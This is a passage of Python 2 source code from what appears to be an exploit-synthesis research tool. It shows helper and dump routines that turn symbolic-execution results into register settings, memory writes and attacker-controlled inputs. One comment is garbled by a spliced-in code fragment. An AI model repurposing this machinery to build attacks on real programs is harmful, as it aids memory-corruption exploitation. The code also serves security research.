ALLOCATOR_BASE_ADDR)                    \n            \n        else:\n            return \"0x%x\" % addr\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __is_relative(): Check if an is relative\n    #\n    # :Arg addr: Current Address\n    # :Ret: True if it's relative. False otherwise.\n    #\n    def __is_relative( self, addr ):\n\n        if addr in self.__relative:                 # if in relative table\n            return True\n\n        elif abs(addr - RSP_BASE_ADDR) < MAX_BOUND:\n            return True\n        \n        elif abs(addr - FRAMEPTR_BASE_ADDR) < MAX_BOUND:\n            return True\n\n        elif abs(addr - POOLVAR_BASE_ADDR) < MAX_BOUND:\n            return True \n\n        elif POOLVAR_BASE_ADDR <= addr <= POOLVAR_BASE_ADDR + self.__plsz:\n            return True\n\n        elif ALLOCATOR_BASE_ADDR <= addr and addr <= ALLOCATOR_CEIL_ADDR:\n            return True\n            \n        else:\n            return False\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # dump(): Dump the results of the simulation.\n    #\n    # :Arg output: The output object\n    # :Ret: None.\n    #\n    def dump( self, output ):\n        # for a, b in self.__relative.iteritems():\n        #     print 'relative', hex(a), b\n\n        output.newline()\n        \n        if self.__plsz > 0:\n            output.comment('Allocation size is always bigger (it may not needed at all)')\n            output.alloc(POOLVAR_NAME, self.__plsz)\n            output.newline()\n\n\n\n        if self.__alloc_size > 0:\n            output.comment('Allocation size is always bigger')\n            output.alloc(ALLOCATOR_NAME, self.__alloc_size)\n            output.newline()\n\n\n        # TODO: make sure that there is a single $rbp, $stack, $frame (not 1 per fork)\n        output.comment('OPTIONAL!')        \n        output.set('$rbp', '$rsp + 0xc00')              # TODO: KEEP ME CONSISTENT!\n\n        output.comment('Stack and frame pointers aliases')\n        output.set('$stack', '$rsp')\n        output.set('$frame', '$rbp')\n        output.newline()\n\n\n        # ---------------------------------------------------------------------\n        # TODO: Having a primitive to set registers may be useless.\n        #       Give the option to the attacker to be able to discard solutions\n        #       that use apriori registers\n        #\n        dbg_prnt(DBG_LVL_0, 'Apriori Register Assignments (if any):')\n\n        for reg, val in self.__reg.iteritems():\n            # tuples are not part of the constraints and therefore are dfor simu in self.__simstash:iscarded\n            if not isinstance(val, tuple):\n\n                dbg_prnt(DBG_LVL_0, '\\t%s = 0x%x (DROP)' % (reg, val))\n                                \n                #output.register(reg, val, comment='(DROP)')\n                output.comment('(DROP) %s = %s' % (reg, val))\n                #output.register(reg, val)\n                #output.newline()\n\n        output.newline()\n\n        for reg, symv in self.__inireg.iteritems():\n            # check if any of the original register is still in the constraints\n            if symv != None:\n                symv = self.__make_relative(symv)\n\n                # print 'OUTPUT:', symv\n                output.register(reg, symv)\n\n        \n        output.newline()\n\n        if self.condreg and isinstance(self.condreg, tuple):            \n            reg, symv = self.condreg\n            symv = self.__make_relative(symv)\n \n            output.comment('(CONDITIONAL) %s = %s' % (reg, symv))\n             \n\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'Memory Addresses for variables (if any):')\n\n        output.newline()\n\n        # variables\n        for addr, values in self.__inivar_rel.iteritems():\n\n            displacement = 0\n\n            # check which elements from values are relative addresses\n            for val in values:                \n                if isinstance(val, str):            # string values are directly packed                    \n                    pval = '{' + ', '.join(\"0x{0:02x}\".format(ord(c)) for c in val) + '}'\n                    size = len(val)\n\n                else:\n                    if not self.__is_relative(val):\n                        pval = '{' + ', '.join(\"0x{0:02x}\".format(ord(c)) for c in struct.pack(\"<Q\", val)) + '}'\n                    else:\n                        pval = self.__make_relative(val)\n\n                    size = 8\n\n\n\n                # calculate address (base + offset + displacement)\n                paddr = \"(%s + 0x%02x)\" % (self.__make_relative(addr), displacement)\n\n\n                displacement += size                # shift inside variable's values\n                output.memory(paddr, pval, size)\n            \n\n                dbg_prnt(DBG_LVL_0, \"\\t*%s = %s\" % (paddr, pval))\n\n\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'Other Memory Addresses:')\n\n        output.newline()\n\n\n        for addr, val in self.__mem.iteritems():\n            if isinstance(val, tuple):\n\n                # if val[0] in self.__relative:\n                if \"0x%x\" % val[0] != self.__make_relative(val[0]):\n                    # pval = '(' + self.__relative[ val[0] ] + ')'\n                    pval = self.__make_relative(val[0])\n\n                else:\n                    # cast integer to zero padded hex string\n                    x = (\"{0:0%dx}\" % (val[1] << 1)).format(val[0])\n\n                    # cast string to bytes and change endianess \n                    x = ''.join(reversed(x.decode('hex')))\n\n                    # print string in C-style format\n                    pval = '{' + ', '.join(\"0x{0:02x}\".format(ord(c)) for c in x) + '}'\n                    #lval = [\"0x{0:02x}\".format(ord(c)) for c in x]\n\n\n                paddr = self.__make_relative(addr)                \n                #   output.memory(addr, '', addr, lval, op='+')\n\n                for a, b in self.__ext.iteritems():\n                    #print '^^^^^^^^^^', a, b, addr\n                    if b != EXTERNAL_UNINITIALIZED and addr == b[0]:\n                        output.comment('value comes from external input (DROP)')\n                        break\n\n\n                output.memory(paddr, pval, val[1])\n\n                dbg_prnt(DBG_LVL_0, \"\\t*%s = %s\\t# %d bytes\" % (paddr, pval, val[1]))\n\n\n        # ---------------------------------------------------------------------\n        dbg_prnt(DBG_LVL_0, 'External Input (if any): ')\n        \n        # TODO: better variable names\n        ext_stdin = { }\n        ext_file  = { }\n        ext_retn  = { }\n        stdin, file, retn = [], [], []\n\n\n        for var, value in self.__ext.iteritems():\n            if value == EXTERNAL_UNINITIALIZED:\n                continue\n            \n\n            if 'stdin' in var.args[0]:\n                ext_stdin[ var.args[0] ] = value\n\n            elif SYMBOLIC_FILENAME in var.args[0]:\n                ext_file[ var.args[0] ] = value\n\n            elif 'unconstrained_ret' in var.args[0]:\n                ext_retn[ var.args[0].replace(\"unconstrained_ret___\", \"\") ] = value\n\n        \n        for var in sorted(ext_stdin):\n            stdin.append('0x%x' % ext_stdin[var][1])\n\n        for var in sorted(ext_file):\n            file.append('0x%x' % ext_file[var][1])\n\n        for var in sorted(ext_retn):\n            retn.append('%s = 0x%x' % (str(var), ext_retn[var][1]))\n        \n        dbg_arb(DBG_LVL_0, 'External input (stdin) :', stdin)\n        dbg_arb(DBG_LVL_0, 'External input (file)  :', file)\n        dbg_arb(DBG_LVL_0, 'External input (return):', retn)\n\n\n        output.newline()\n        output.comment('External input (stdin): %s'  % str(stdin))\n        output.comment('External input (%s): %s'     % (SYMBOLIC_FILENAME, str(file)))\n        output.comment('External input (return): %s' % str(retn))\n        \n\n        # for a,b in self.__relative.iteritems():\n        #     print 'ADDR2SYM', hex(a), b\n\n\n        dbg_prnt(DBG_LVL_0, \"pool_base  = 0x%x\" % POOLVAR_BASE_ADDR)\n        dbg_prnt(DBG_LVL_0, \"stack_base = 0x%x\" % RSP_BASE_ADDR)\n        \n\n\n# -------------------------------------------------------------------------------------------------\n"
  }
]